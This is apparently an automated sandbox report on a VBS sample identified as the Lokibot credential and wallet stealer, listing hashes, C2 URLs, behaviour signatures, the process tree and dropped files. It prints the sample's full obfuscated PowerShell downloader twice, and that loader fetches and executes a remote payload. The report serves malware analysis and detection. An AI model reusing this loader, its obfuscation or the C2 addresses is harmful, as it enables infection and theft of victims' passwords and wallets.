Overview

overview

10

Static

static

1

12cf262af8...94.vbs

windows7-x64

10

12cf262af8...94.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-10-2024 01:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    12cf262af8e265c0013ba1e06bfe89b0e9b65acffe82f2f54121dcd434c4b394.vbs

  • Size

    73KB

  • MD5

    5cc7cf5b0814e2f80bad4c4e85831e96

  • SHA1

    93ed4011fc57034804feb5bd8ea61c6cf7b30cce

  • SHA256

    12cf262af8e265c0013ba1e06bfe89b0e9b65acffe82f2f54121dcd434c4b394

  • SHA512

    f9834c708ff8af1734b345f156d7abcebc8675f6e481fe65ac4512578d71cac11a3eba9779f2708a990858da9dce32c2e8416c967b77701991d7692393fa8c09

  • SSDEEP

    1536:s+0UNtNTLbVAumhqIkeF+3e+2Tyf4hHKMHAqLkf:s+5LfAFh62TS4hKf

Score
10/10
lokibotcollectiondiscoveryexecutionspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://137.184.191.215/index.php/10899

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12cf262af8e265c0013ba1e06bfe89b0e9b65acffe82f2f54121dcd434c4b394.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3624
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fogydom=(Dioptres 'Mildh$FysikGDiffeL SusloWholiBMidlaaS,orsLIndis:objecDForbri,rlaaAHogowpSqua.HLuftlEI.surmChapeeAe,opTdyngerHan,ki ,fpaCBalal= SkrinGaddieTakstW Labi-Icer oHybriB herpJMorolEPenwoCE,ectTLangf VirakSFors YForb.SPreaxTPlataE Weekm Epic. BrkeNAgat,eAf,erTDivin. uiriWSoa aE roftBOpparCLocomLTransI,okuseO sigNpast.TDenti ');Unhandled ($Fogydom);Unhandled (Dioptres 'A ago$Assesd.yrani Pantaen.ompInninh Erine blegmOp raeHarmatAssocrNonspi,irkucviol .RegulHNbsune tabuaTr wld Flive portrDightsPisto[ T.ig$ neigJPermio B,drr UndedTra ksSalgsk SafroBrandrM ndipdebete Anstn HekssSekon]Betnk=Cardi$Spi tP .illhTungeoRe enrIndbloC,mpunKalk.oIce pmLestsyPreso ');$Tailwind=Dioptres ' ilde$ Upstd retriSikkeac bolp FatahSuffleSpun mStudeehoo.rtP ilor obbi ndelcAnfre.BesegDSlaveo Bev,wse denSpejllSlagtoKundeaUniondvingeFParaliMar ylSix,eeCadav(Ligbr$PapirP Billa ienetFuldkiSemipeGarg nU.pertrom nenick rFono.n H jseJaywasOve.b,Intra$ MeloDRterseSlimilFar,ii ImmekInimiaHjrest UndeelevnerRaphaeUdtryrPaa k) Fo b ';$Delikaterer=$Gendigtende;Unhandled (Dioptres 'Gaunt$Cons,guncouLHummaoforunBInhalaInt.rLspros:M,ldeSforfek gav lDimenvferieElibecSTilsk= co,f(DecimT .ndbeUlvefSSagamTelvil-TetraPAfvrgAC midt Grunh Node lave$S rikDA rime hoklPhiloiDalstKBesaaA AlbeTN ingeAgonirKonkre .nprrTypeg)Deput ');while (!$Sklves) {Unhandled (Dioptres 'Paryk$ Indkgbattll SkatoTheribWarluaN.dstlafble: Mir Acancef PsycsTolyltAflsetBob seBardelVitiasChromeJulek=Indlg$LudvitBeklirSusp.uSo tseAurig ') ;Unhandled $Tailwind;Unhandled (Dioptres ' PjasSMedict BltuaAnkusrinvestU bar-CamatSReplil adseeNondiePalmepAfgre Abel4Togvo ');Unhandled (Dioptres 'Studd$ FourgNondelCrut o Ruinb Trmaa Do xlIntel:SamhaSFi,erkRem.tl HomevTripteAf ensAbonn= Kolo(.odgaT ZabaeGasops BesttDishl-ReimbPhemola RayatN elshImp,n Rem s$brnebDSpleneCasqulP ioriHoeinkBnkbaaOba ntAntedeIntenrSkr leAfhenrSn sc) ave ') ;Unhandled (Dioptres 'Ke.li$ Bridg PennlG,ffeoSterebInfumaThou,lBlowb:vvninEDrlu xIndtrtSociarChurcoFosf.vOmn.veKoftgrSo set.perae.nsfodDeten=Kimri$ Anstg.inualstyfuoForstbSterca Pr,il Chef:MultiSShockaArchfmCutinv acedioverit erbet ortbiNe icgU.skrhBrandeStru,dFlngns ilkesExtinp liter ookgLecitsep.tamRad.kaTeentaChenilKolon+Uds.e+Begle%Burmi$Me,alSlegiot F rea Samtn RelidDeerfsOvatoe UngedHelveeGenne.esotecBoa,do BarbuSem.pnCabostfocus ') ;$Patienternes=$Standsede[$Extroverted];}$Senehinderne=336660;$Dihydrocuprin=31885;Unhandled (Dioptres 'Jabbe$BremsgKam kl LawmotelefbAabena esslCessi: Tra F eparoAll,srBe etoIrokevProleeQu,ndrkarrebCybe jp.akleSex,id rerse N,ncsPle,r orbe=cyclo CypseGTyksteAssi tTelef-StvstCSp vvosquibnau ictSa.eleAuricnPectitender Trest$ObserDSkovgecentelkrigsiPptnhkTekstaIdealt s mieO angrBilfreWass rHaand ');Unhandled (Dioptres ' Stal$HalshgSkyggl uebloKongub Panga leiglg.ppe:JonbySRe ittSterea Nejsm irebkUnderoPrtenr Enc,tPhy ieStencnForeseDe mosAmtsr Armer=Vakan Plomb[CastiSGymnaySammesTry btPyrame Lovmm Land.Cau.iC UnseoForbrnWombsv ilineBaller Eskot Vild] edbr: Indp:NedlaFRubber KopeoPo.ypm HeliBTelega Sp.esAlterePukle6Ana y4Und rSNoncotDo rirT leaiBroomnw odsgNs et( ,ank$ProtoF ikeoOverfrAbidjoFremmvPiggeeTr nsrDairybAc orjOver eOvenldTrikieMea es Bubb),iske ');Unhandled (Dioptres ' Di p$ rogvgAn lll Bnsko F.ndbSysseaAverhlCacot:TyndeUVagtvnKabarfP rliaSubresphyl tOutfiiResy nFreelgHfter Pirri=Ambus Kvind[ KobbS Dre yPsyk s A.frtArbite allumdilec.Hol oTcircueAntilx Geort Foru.DiablEGuimpn SvvecEksh.oSnyltdTriariBacilnBaha gHavfi] Gewg:Bakte:nul,iAunparS T.ggC ictiIDisceIOvert.helb GSklveeSkidttEsperSVilj tPiranr AvneiProv n Fre gLreri(,ynov$ hoyaS .tortEffu,acarbomTravek rawoTapetr QuadtGringe enudnG arreSaudis Aver) Leuc ');Unhandled (Dioptres 'Acond$Hum lgTricylAlfero,entabOverpaBodysl arco:I triCRhip.rFertiiOverhsEnt,rpValgreUbrugnF ldbi OvernCere,gIn um= Apol$PiragUStrmpn Gramf Sur,aExtrasVariat Pas iUndernEntopgMatr .MetazsTip iuAssyrb Studs schat StrorKamtaiFiorinplaybgMet,m(Re.en$ SyedSMariteFremfn SalteUnderhgreasi AxotnFreewd ,orseA.acarOtteon ho.eeMurd.,cec d$ForvaDTeodoiStav,hTrosiyacci dSkumprTarpioZaibacSulcauDecrepAtticrRefeeiAfst nTorta)Produ ');Unhandled $Crispening;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3448
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fogydom=(Dioptres 'Mildh$FysikGDiffeL SusloWholiBMidlaaS,orsLIndis:objecDForbri,rlaaAHogowpSqua.HLuftlEI.surmChapeeAe,opTdyngerHan,ki ,fpaCBalal= SkrinGaddieTakstW Labi-Icer oHybriB herpJMorolEPenwoCE,ectTLangf VirakSFors YForb.SPreaxTPlataE Weekm Epic. BrkeNAgat,eAf,erTDivin. uiriWSoa aE roftBOpparCLocomLTransI,okuseO sigNpast.TDenti ');Unhandled ($Fogydom);Unhandled (Dioptres 'A ago$Assesd.yrani Pantaen.ompInninh Erine blegmOp raeHarmatAssocrNonspi,irkucviol .RegulHNbsune tabuaTr wld Flive portrDightsPisto[ T.ig$ neigJPermio B,drr UndedTra ksSalgsk SafroBrandrM ndipdebete Anstn HekssSekon]Betnk=Cardi$Spi tP .illhTungeoRe enrIndbloC,mpunKalk.oIce pmLestsyPreso ');$Tailwind=Dioptres ' ilde$ Upstd retriSikkeac bolp FatahSuffleSpun mStudeehoo.rtP ilor obbi ndelcAnfre.BesegDSlaveo Bev,wse denSpejllSlagtoKundeaUniondvingeFParaliMar ylSix,eeCadav(Ligbr$PapirP Billa ienetFuldkiSemipeGarg nU.pertrom nenick rFono.n H jseJaywasOve.b,Intra$ MeloDRterseSlimilFar,ii ImmekInimiaHjrest UndeelevnerRaphaeUdtryrPaa k) Fo b ';$Delikaterer=$Gendigtende;Unhandled (Dioptres 'Gaunt$Cons,guncouLHummaoforunBInhalaInt.rLspros:M,ldeSforfek gav lDimenvferieElibecSTilsk= co,f(DecimT .ndbeUlvefSSagamTelvil-TetraPAfvrgAC midt Grunh Node lave$S rikDA rime hoklPhiloiDalstKBesaaA AlbeTN ingeAgonirKonkre .nprrTypeg)Deput ');while (!$Sklves) {Unhandled (Dioptres 'Paryk$ Indkgbattll SkatoTheribWarluaN.dstlafble: Mir Acancef PsycsTolyltAflsetBob seBardelVitiasChromeJulek=Indlg$LudvitBeklirSusp.uSo tseAurig ') ;Unhandled $Tailwind;Unhandled (Dioptres ' PjasSMedict BltuaAnkusrinvestU bar-CamatSReplil adseeNondiePalmepAfgre Abel4Togvo ');Unhandled (Dioptres 'Studd$ FourgNondelCrut o Ruinb Trmaa Do xlIntel:SamhaSFi,erkRem.tl HomevTripteAf ensAbonn= Kolo(.odgaT ZabaeGasops BesttDishl-ReimbPhemola RayatN elshImp,n Rem s$brnebDSpleneCasqulP ioriHoeinkBnkbaaOba ntAntedeIntenrSkr leAfhenrSn sc) ave ') ;Unhandled (Dioptres 'Ke.li$ Bridg PennlG,ffeoSterebInfumaThou,lBlowb:vvninEDrlu xIndtrtSociarChurcoFosf.vOmn.veKoftgrSo set.perae.nsfodDeten=Kimri$ Anstg.inualstyfuoForstbSterca Pr,il Chef:MultiSShockaArchfmCutinv acedioverit erbet ortbiNe icgU.skrhBrandeStru,dFlngns ilkesExtinp liter ookgLecitsep.tamRad.kaTeentaChenilKolon+Uds.e+Begle%Burmi$Me,alSlegiot F rea Samtn RelidDeerfsOvatoe UngedHelveeGenne.esotecBoa,do BarbuSem.pnCabostfocus ') ;$Patienternes=$Standsede[$Extroverted];}$Senehinderne=336660;$Dihydrocuprin=31885;Unhandled (Dioptres 'Jabbe$BremsgKam kl LawmotelefbAabena esslCessi: Tra F eparoAll,srBe etoIrokevProleeQu,ndrkarrebCybe jp.akleSex,id rerse N,ncsPle,r orbe=cyclo CypseGTyksteAssi tTelef-StvstCSp vvosquibnau ictSa.eleAuricnPectitender Trest$ObserDSkovgecentelkrigsiPptnhkTekstaIdealt s mieO angrBilfreWass rHaand ');Unhandled (Dioptres ' Stal$HalshgSkyggl uebloKongub Panga leiglg.ppe:JonbySRe ittSterea Nejsm irebkUnderoPrtenr Enc,tPhy ieStencnForeseDe mosAmtsr Armer=Vakan Plomb[CastiSGymnaySammesTry btPyrame Lovmm Land.Cau.iC UnseoForbrnWombsv ilineBaller Eskot Vild] edbr: Indp:NedlaFRubber KopeoPo.ypm HeliBTelega Sp.esAlterePukle6Ana y4Und rSNoncotDo rirT leaiBroomnw odsgNs et( ,ank$ProtoF ikeoOverfrAbidjoFremmvPiggeeTr nsrDairybAc orjOver eOvenldTrikieMea es Bubb),iske ');Unhandled (Dioptres ' Di p$ rogvgAn lll Bnsko F.ndbSysseaAverhlCacot:TyndeUVagtvnKabarfP rliaSubresphyl tOutfiiResy nFreelgHfter Pirri=Ambus Kvind[ KobbS Dre yPsyk s A.frtArbite allumdilec.Hol oTcircueAntilx Geort Foru.DiablEGuimpn SvvecEksh.oSnyltdTriariBacilnBaha gHavfi] Gewg:Bakte:nul,iAunparS T.ggC ictiIDisceIOvert.helb GSklveeSkidttEsperSVilj tPiranr AvneiProv n Fre gLreri(,ynov$ hoyaS .tortEffu,acarbomTravek rawoTapetr QuadtGringe enudnG arreSaudis Aver) Leuc ');Unhandled (Dioptres 'Acond$Hum lgTricylAlfero,entabOverpaBodysl arco:I triCRhip.rFertiiOverhsEnt,rpValgreUbrugnF ldbi OvernCere,gIn um= Apol$PiragUStrmpn Gramf Sur,aExtrasVariat Pas iUndernEntopgMatr .MetazsTip iuAssyrb Studs schat StrorKamtaiFiorinplaybgMet,m(Re.en$ SyedSMariteFremfn SalteUnderhgreasi AxotnFreewd ,orseA.acarOtteon ho.eeMurd.,cec d$ForvaDTeodoiStav,hTrosiyacci dSkumprTarpioZaibacSulcauDecrepAtticrRefeeiAfst nTorta)Produ ');Unhandled $Crispening;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2944
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
        PID:1904
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\syswow64\msiexec.exe"
        2⤵
          PID:3092
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\syswow64\msiexec.exe"
          2⤵
            PID:4968
          • C:\Windows\SysWOW64\msiexec.exe
            "C:\Windows\syswow64\msiexec.exe"
            2⤵
              PID:4072
            • C:\Windows\SysWOW64\msiexec.exe
              "C:\Windows\syswow64\msiexec.exe"
              2⤵
                PID:4088
              • C:\Windows\SysWOW64\msiexec.exe
                "C:\Windows\syswow64\msiexec.exe"
                2⤵
                  PID:3972
                • C:\Windows\SysWOW64\msiexec.exe
                  "C:\Windows\syswow64\msiexec.exe"
                  2⤵
                    PID:4148
                  • C:\Windows\SysWOW64\msiexec.exe
                    "C:\Windows\syswow64\msiexec.exe"
                    2⤵
                      PID:852
                    • C:\Windows\SysWOW64\msiexec.exe
                      "C:\Windows\syswow64\msiexec.exe"
                      2⤵
                        PID:4272
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\syswow64\msiexec.exe"
                        2⤵
                          PID:4200
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\syswow64\msiexec.exe"
                          2⤵
                            PID:4844
                          • C:\Windows\SysWOW64\dxdiag.exe
                            "C:\Windows\syswow64\dxdiag.exe"
                            2⤵
                              PID:3640
                            • C:\Windows\SysWOW64\dxdiag.exe
                              "C:\Windows\syswow64\dxdiag.exe"
                              2⤵
                              • Accesses Microsoft Outlook profiles
                              • Suspicious use of NtCreateThreadExHideFromDebugger
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              • outlook_office_path
                              • outlook_win_path
                              PID:2964

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            71444def27770d9071039d005d0323b7

                            SHA1

                            cef8654e95495786ac9347494f4417819373427e

                            SHA256

                            8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

                            SHA512

                            a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0a415adx.svx.ps1
                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2629364133-3182087385-364449604-1000\0f5007522459c86e95ffcc62f32308f1_83e33dcf-e635-4313-9cdc-036589dffc77
                            Filesize

                            46B

                            MD5

                            d898504a722bff1524134c6ab6a5eaa5

                            SHA1

                            e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

                            SHA256

                            878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

                            SHA512

                            26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2629364133-3182087385-364449604-1000\0f5007522459c86e95ffcc62f32308f1_83e33dcf-e635-4313-9cdc-036589dffc77
                            Filesize

                            46B

                            MD5

                            c07225d4e7d01d31042965f048728a0a

                            SHA1

                            69d70b340fd9f44c89adb9a2278df84faa9906b7

                            SHA256

                            8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

                            SHA512

                            23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Tallowweed.Kli
                            Filesize

                            479KB

                            MD5

                            c5139b3748a3d2e8508528467db482e6

                            SHA1

                            e5f28f16eb9afc3d80cf0998994b5d705d319cf7

                            SHA256

                            3e716cb2d2058cceb704989730f24517aa7ebe00b09fec07c2452b3dff6e152b

                            SHA512

                            fce4bd2e64097f5d1f65763732601b43db2e82cb7be362a5775f1aadc293cbc107361ef2d2e8c6e29e1197ca03055e210982817b1e49d8b401603414e7002ff7

                            Download Submit

                          • memory/2944-42-0x00000000069A0000-0x00000000069BA000-memory.dmp

                            Filesize

                            104KB

                            Download

                          • memory/2944-39-0x0000000006400000-0x000000000641E000-memory.dmp

                            Filesize

                            120KB

                            Download

                          • memory/2944-47-0x0000000008E20000-0x000000000D32C000-memory.dmp

                            Filesize

                            69.0MB

                            Download

                          • memory/2944-45-0x0000000008870000-0x0000000008E14000-memory.dmp

                            Filesize

                            5.6MB

                            Download

                          • memory/2944-44-0x0000000007600000-0x0000000007622000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/2944-43-0x0000000007660000-0x00000000076F6000-memory.dmp

                            Filesize

                            600KB

                            Download

                          • memory/2944-23-0x0000000002B20000-0x0000000002B56000-memory.dmp

                            Filesize

                            216KB

                            Download

                          • memory/2944-24-0x0000000005560000-0x0000000005B88000-memory.dmp

                            Filesize

                            6.2MB

                            Download

                          • memory/2944-25-0x0000000005530000-0x0000000005552000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/2944-26-0x0000000005C30000-0x0000000005C96000-memory.dmp

                            Filesize

                            408KB

                            Download

                          • memory/2944-27-0x0000000005CA0000-0x0000000005D06000-memory.dmp

                            Filesize

                            408KB

                            Download

                          • memory/2944-33-0x0000000005DD0000-0x0000000006124000-memory.dmp

                            Filesize

                            3.3MB

                            Download

                          • memory/2944-41-0x0000000007C40000-0x00000000082BA000-memory.dmp

                            Filesize

                            6.5MB

                            Download

                          • memory/2944-40-0x0000000006430000-0x000000000647C000-memory.dmp

                            Filesize

                            304KB

                            Download

                          • memory/2964-61-0x0000000000400000-0x00000000005E4000-memory.dmp

                            Filesize

                            1.9MB

                            Download

                          • memory/2964-62-0x0000000000400000-0x00000000005E4000-memory.dmp

                            Filesize

                            1.9MB

                            Download

                          • memory/3448-15-0x00007FFBFBB80000-0x00007FFBFC641000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/3448-14-0x00007FFBFBB83000-0x00007FFBFBB85000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/3448-0-0x00007FFBFBB83000-0x00007FFBFBB85000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/3448-22-0x00007FFBFBB80000-0x00007FFBFC641000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/3448-19-0x00007FFBFBB80000-0x00007FFBFC641000-memory.dmp

                            Filesize

                            10.8MB

                            Download

